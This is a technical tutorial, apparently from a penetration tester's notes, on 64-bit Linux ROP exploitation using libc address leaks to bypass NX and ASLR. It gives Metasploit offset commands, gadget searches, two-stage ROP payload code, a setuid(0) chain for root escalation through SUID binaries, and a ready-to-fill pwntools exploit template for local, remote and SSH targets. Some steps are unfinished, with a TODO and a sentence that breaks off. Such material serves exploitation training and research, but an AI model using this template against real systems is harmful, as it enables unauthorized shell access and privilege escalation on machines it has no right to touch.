Linux - ELF64 ROP leaks


In 64-bit architecture, the RIP register is the instruction pointer register, equivalent to the 32-bit x86 architecture's EIP register.

Preliminary checks


A ROP exploit should only be used under certain circumstances, as more easier and straightforward techniques could potentially be used to exploit a buffer overflow vulnerability.

A ROP is needed whenever the kernel on which the binary is executed is making use of executable-space protection mechanisms, preventing execution of certain memory regions in the stack by the processor. Indeed, if the mechanism is activated, any added shell code in the stack through the buffer overflow could not be directly executed. On Linux systems, the NX bit (no-execute bit) is responsible for the activation of this mechanism.

Another protection mechanism protecting against the exploitation of buffer overflow vulnerability is the address space layout randomization (ASLR). In order to prevent reliable jumping to particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries. With ASLR activated it is thus not possible to jump at the memory address of a shell code placed in the stack or at a pre determined function, such as system in the libc.

The technique presented in this note should only be used whenever both NX and ASLR mechanisms are being used.

The rabin2 utility can be used to retrieve the protection mechanisms of a binary:

rabin2 -I <BINARY>
arch     x86
bits     64
canary   false
class    ELF64
endian   little
nx       true

Printing functions

The exploitation technique presented in this note premised on the fact that addresses contained in the libc can be leaked. A function allowing a display on stdout is therefore necessary and must be present in the binary. The puts and write functions can be used to this effect for example.

The objdump Linux can be used to disassemble a binary and display the plt section, which contains references to external functions called by the binary.

objdump -D <BINARY> | grep "puts\|write"

At least one of the functions above must be present in order to conduct a ROP exploit based on libc addresses leaks.

Calculate padding

The first step is to determine the needed number of bytes to overflow the injected buffer in order to overwrite the rip instruction pointer register.

The pattern_create.rb and pattern_offset.rb ruby scripts of the Metasploit framework can be used to calculate this offset.

If the binary is provided, gdp can be used to retrieve the value contained in the rsp registry after the crash. If the binary is only accessible remotely and can not be debugged, TODO

/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 5000
gdb-peda$ x/g $rsp

/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 5000 -q <RETURNED_PATTERN>
[*] Exact match at offset <RIP_OFFSET>

Leak libc address

Once the padding needed to overwrite rip is known, the next step is to leak the address of a libc function in the GOT table.

Pass argument to the printing function

On 64-bit architecture, the rdi register is used to pass the first argument to the called function. A gadget popping a value from the stack into the rdi register is thus needed to specify what should be printed as an argument to the printing function.

The r2 utility can, among others, be used to find a pop rdi gadget:

[0xXXXXXXXX]> /R pop rdi
0x<ADR_POP_RDI>     5f  pop rdi
0xXXXXXXX           c3  ret

If the printing function takes more than one argument, gadgets to populate the following registers must be found:

  • %rsi : 2nd argument ;

  • %rdx : 3rd argument ;

  • %rcx : 4th argument ;

  • %r8 : 5th argument ;

  • %r9 : 6th argument.

Printing function PLT and GOT entries

The entries in the PLT and GOT tables for the printing function must be retrieved, which can be done by disassembling the plt entry of the binary with the objdump Linux utility:

objdump -D <BINARY> | grep <PRINTING_FUNC>
<ADR_PLT_PRINTING>:	ff 25 32 0b 20 00    	jmpq   *0x200b32(%rip)        # <ADR_GOT_PRINTING> <PRINTING_FUNC@GLIBC_2.2.5>

Return to main

To continue the program execution flow after printing the GOT entry in libc, in order to avoid the re randomization of the address space, a return at the beginning of the program, the main function, is needed. It simply consist in adding the main function address in the ROP chain after calling the printing function. This mechanism is called ret2main.

The address of the main function in the text section can found using the objdump Linux utility:

objdump -D <BINARY> | grep main
<0000000000ADR_MAIN> <main>:

Stage 1 payload

Once the needed addresses have been retrieved, the following ROP chain can be constructed: junk + pop_rdi + printing_func_got + printing_func_plt + main_plt.

The following Python snippet can be used to generate the payload:

junk = 'A' * <PADDING>

# Address example: 0x404028

# Python built-ins
pop_rdi = struct.pack('<Q', <ADR_POP_RDI>)
printing_func_plt = struct.pack('<Q', <ADR_PLT_PRINTING>)
printing_func_got = struct.pack('<Q', <ADR_GOT_PRINTING>)
main_plt = struct.pack('<Q', <ADR_MAIN>)

# pwntools
pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt

Automated parsing of the leaked address

The address of the printing function should be leaked and printed on stdout by the process. This value must be retrieved and stored in a variable for future use, as its needed to calculate the libc randomized offset.

pwntools can be used to automate the process:

# If the binary display text before leaking the address
leaked_printing_func = p.recv()[:8].strip().ljust(8, '\x00')
leaked_printing_func = u64(leaked_printing_func)

The process can also be done using only Python built-ins, for example if the binary exploitation is made using a subprocess:

out = read_until(p.stdout, '<STUFF>')
arr = out.split('\n')
leaked_print_func = arr[2].strip().ljust(8,'\x00')
leaked_print_func = struct.unpack('<Q', leaked_printing_func)[0]

Commands execution

The leaked printing function address can be used to retrieve the actual address of the libc functions, such as system in order to call, for example, /bin/sh, and achieve code execution through the exploited binary.

Find libc symbols offsets

Retrieve libc symbols offsets with access to the libc

If an access to the libc loaded by the exploited binary is possible, the symbol offsets of the libc can easily be retrieved. Note that the libc is usually located in the lib folder: /lib/x86_64-linux-gnu/

readelf -s <LIBC> | grep <PRINTING_FUNC>
422: <00000000000ADR_LIBC_PRINTING_FUNC>   512 FUNC    WEAK   DEFAULT   13 <PRINTING_FUNC>@@GLIBC_2.2.5

readelf -s <LIBC> | grep system
1403: <00000000000ADR_LIBC_SYSTEM>    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5

# /bin/sh, /bin/bash, etc.
strings -a -t x <LIBC> | grep "/bin/sh"
<ADR_LIBC_SH> /bin/sh

Retrieve libc symbols offsets without access to the libc

If no direct access to the libc is possible in the exploitation context, the symbols offsets of the libc being used by the process can still be retrieved. Indeed, the libc-database can be used to determine the libc loaded given two entries of the GOT table. Search queries to the database can be make using

A second entry in the GOT table must be obtained:

objdump -D ropme | grep "GLIBC"
<ADR_PLT_FUNC>:	ff 25 22 0b 20 00    	jmpq   *0x200b22(%rip)        # <ADR_GOT_FUNC> <FUNC@GLIBC_2.2.5>

Calculate randomized libc addresses

Once the symbols offsets of the libc being used have been retrieved, the randomized libc addresses of the process can be calculated using the leaked printing function address:

leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

Specificities of SUID binaries

In case of exploiting an SUID binary for local privilege escalation, the privileges granted by the SUID bit may be dropped. Notably libc includes security mitigations whenever calling system() with /bin/sh that drops the privileges if euid (process effective user identifier) != uid (user identifier). In case of an SUID binary, the euid corresponds to the uid of the binary owner.

A call to setuid can be used before calling system("/bin/sh") to change the uid of the process to the one of the binary owner, usually 0 in case of privilege escalation to root.

readelf -s <LIBC> | grep setuid
25: <00000000000ADR_LIBC_SETUID>   144 FUNC    WEAK   DEFAULT   13 setuid@@GLIBC_2.2.5

Stage 2 payload

Once the randomized addresses of system and /bin/sh in libc are obtained, the following ROP chain can be used to achieve code execution:

  • with out setuid: junk + pop_rdi + sh + sys

  • with setuid, for SUID binaries, junk + pop_rdi + 0x<EUID> + setuid + pop_rdi + sh + sys

leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# setuid
libc_setuid = <ADR_LIBC_SETUID>
# Python built-ins
setuid = struct.pack('<Q', libc_base + libc_setuid)
# pwntools
setuid = p64(libc_base + libc_setuid)

payload = junk
# setuid
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# pwntools

pwntools final code template

The following exploit code can be used as a template to exploit ROP buffer overflow vulnerability with libc address leaks:

import sys
import time

from pwn import *

context(os = 'linux', arch = 'amd64')



if (sys.argv[1] == 'local'):
  p = process(BINARY)
  context.log_level = 'DEBUG'

elif (sys.argv[1] == 'remote'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  p = remote(HOST, PORT)

elif (sys.argv[1] == 'ssh'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  s = ssh(host=HOST, port=PORT, user=USERNAME, password=PASSWORD)
  p = s.process(BINARY)

junk = OFFSET * 'A'

pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt

# If needed
# p.recvuntil(<STUFF>)


# If needed
# p.recvuntil(<STUFF>)

leaked_printing_func = p.recvline()[:-1].ljust(8, '\x00')
leaked_printing_func = u64(leaked_printing_func)
log.success('PRINTING_FUNC@GLIBC addr: 0x{:x}'.format(leaked_printing_func))

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# If a setuid call is needed
libc_setuid = <ADR_LIBC_SETUID>
setuid = p64(libc_base + libc_setuid)

payload = junk
# If a setuid call is needed - here with an EUID = 0 (root)
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# If needed
# p.recvuntil(<STUFF>)


Last updated